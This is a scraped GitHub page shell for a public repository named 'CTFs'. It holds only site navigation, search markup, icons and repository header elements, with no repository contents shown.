<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="102334842" data-scoped-search-url="/AnisBoss/CTFs/search" data-owner-scoped-search-url="/users/AnisBoss/search" data-unscoped-search-url="/search" data-turbo="false" action="/AnisBoss/CTFs/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="f0zpE6/nMkwvGmuBQ2GysIOrUXzR3bnYKiOcov/62K/LgMehHxivq65UuoS+Wmuw1XiIeXqML4vTFceDoS5v1Q==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> AnisBoss </span> <span>/</span> CTFs
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>6</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/AnisBoss/CTFs/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
